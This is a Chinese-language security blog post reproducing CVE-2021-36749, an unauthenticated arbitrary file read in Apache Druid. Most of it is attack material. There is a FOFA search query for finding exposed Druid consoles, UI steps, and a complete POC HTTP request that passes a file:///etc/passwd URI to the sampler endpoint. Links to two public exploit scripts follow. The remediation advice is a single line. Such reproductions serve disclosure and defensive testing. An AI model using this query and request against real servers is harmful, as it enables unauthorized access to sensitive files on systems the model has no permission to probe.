Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

【漏洞复现】 Apache Druid LoadData 任意文件读取漏洞(CVE-2021-36749)

漏洞复现 Adminxe 5336℃ 0评论

0x00 漏洞详情

由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP
InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。

0x01 fofa语法

title="Apache Druid"

0x02 漏洞复现

主界面–>Load data –>HTTP(s)–>Connect Data–>URIs(使用file://协议进行读取)

file:///etc/passwd

POC:

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 127.0.0.1:8888
Content-Length: 413
Accept: application/json, text/plain, */*
Origin: http://127.0.0.1:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json;charset=UTF-8
Referer: http://127.0.0.1:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

0x03 利用脚本

  • https://github.com/BrucessKING/CVE-2021-36749/blob/main/CVE-2021-36749.py
  • https://github.com/dorkerdevil/CVE-2021-36749/blob/main/CVE-2021-36749.py

0x04 修复方法

升级版本,设置访问权限

转载请注明:Adminxe's Blog » 【漏洞复现】 Apache Druid LoadData 任意文件读取漏洞(CVE-2021-36749)

喜欢 (37)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
(1)个小伙伴在吐槽
  1. 不错,必须顶一下!
    zmt2021-12-08 10:13 回复